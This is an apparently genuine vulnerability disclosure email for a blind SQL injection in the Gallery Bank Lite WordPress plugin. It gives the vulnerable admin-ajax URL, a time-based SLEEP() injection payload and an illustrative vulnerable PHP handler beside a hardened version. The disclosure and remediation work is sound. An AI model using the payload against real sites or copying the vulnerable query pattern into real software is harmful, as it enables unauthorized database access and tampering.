Subject: Blind SQL injection in Gallery Bank Lite Edition Version 3.0.229
Date: Fri, 21 Aug 2015 10:51:57 +0200

Hello,

Plugin: Gallery Bank Lite Edition Version 3.0.229 https://wordpress.org/plugins/gallery-bank/

1. Blind SQL injection

Authenticated users (such as editors) can execute arbitrary SQL statements. The handler also has no CSRF protection, so the request can be triggered from a page visited by a logged-in user.

Method: GET
URL: http://localhost/wp-admin/admin-ajax.php?action=add_new_album_library&param=delete_pic&delete_array=[sqli]
Vulnerable parameter: delete_array

Example PHP callstack:
/gallery-bank/lib/add-new-album-class.php:178
wpdb::query  

Verification:
http://localhost/wp-admin/admin-ajax.php?action=add_new_album_library&param=delete_pic&delete_array=-1)%20and%20(SELECT%20*%20FROM%20(SELECT%20SLEEP(5))XXX);%20--%20-

Decoded, the delete_array value is:
-1) and (SELECT * FROM (SELECT SLEEP(5))XXX); -- -

A response delayed by about five seconds confirms that the injected SLEEP() was executed by the database (time-based blind injection).
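The pattern behind this finding, shown as an added example rather than the plugin's own code (the real handler at add-new-album-class.php:178 is not reproduced here): a hypothetical WordPress AJAX handler that drops delete_array straight into a DELETE ... WHERE ... IN (...) query, beside a hardened version that checks a nonce and a capability, reduces the input to positive integers and binds them through $wpdb->prepare(). The table name, the nonce action name, the capability and the AJAX action name are assumptions.

```php
<?php
// Added example, not code from Gallery Bank. Table name, nonce action,
// capability and AJAX action name are assumptions chosen for illustration.

// --- Vulnerable pattern (what the advisory describes) -------------------
// delete_array arrives as a comma-separated list of picture IDs and is
// placed in the query unchanged, so a value such as
//   -1) and (SELECT * FROM (SELECT SLEEP(5))XXX); -- -
// becomes part of the WHERE clause and MySQL evaluates it.
function gb_delete_pics_vulnerable() {
    global $wpdb;
    $delete_array = $_GET['delete_array'];            // untrusted, unvalidated
    $table = $wpdb->prefix . 'gallery_bank_pics';     // assumed table name
    $wpdb->query("DELETE FROM {$table} WHERE pic_id IN ({$delete_array})");
}

// --- Hardened version ---------------------------------------------------
function gb_delete_pics_hardened() {
    global $wpdb;

    // CSRF: the request must carry a nonce issued to this user for this
    // action (created with wp_create_nonce('gb_delete_pic')); dies otherwise.
    check_ajax_referer('gb_delete_pic', 'nonce');

    // Authorization: only users allowed to manage uploaded media may delete.
    if (!current_user_can('upload_files')) {
        wp_send_json_error('forbidden', 403);
    }

    // Input: keep only positive integers; everything else is discarded.
    $raw = isset($_GET['delete_array']) ? wp_unslash($_GET['delete_array']) : '';
    $ids = array_values(array_filter(
        array_map('intval', explode(',', $raw)),
        function ($id) { return $id > 0; }
    ));
    if (empty($ids)) {
        wp_send_json_error('no valid ids', 400);
    }

    // wpdb::prepare() has no IN-list placeholder, so build one %d per id
    // and pass the id array as the argument list.
    $table        = $wpdb->prefix . 'gallery_bank_pics';
    $placeholders = implode(',', array_fill(0, count($ids), '%d'));
    $sql          = $wpdb->prepare(
        "DELETE FROM {$table} WHERE pic_id IN ({$placeholders})",
        $ids
    );
    $deleted = $wpdb->query($sql);

    wp_send_json_success(array('deleted' => (int) $deleted));
}

// Register the hardened handler for logged-in users only (wp_ajax_*, not
// wp_ajax_nopriv_*). The client must send the nonce as the "nonce" parameter.
add_action('wp_ajax_gb_delete_pic', 'gb_delete_pics_hardened');
```

With the hardened handler, the verification payload above never reaches the query: the nonce check rejects a request that a third-party page forged, and intval() turns the injected string into a single integer before it is bound.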

-- 
Regards,
Marcin Probola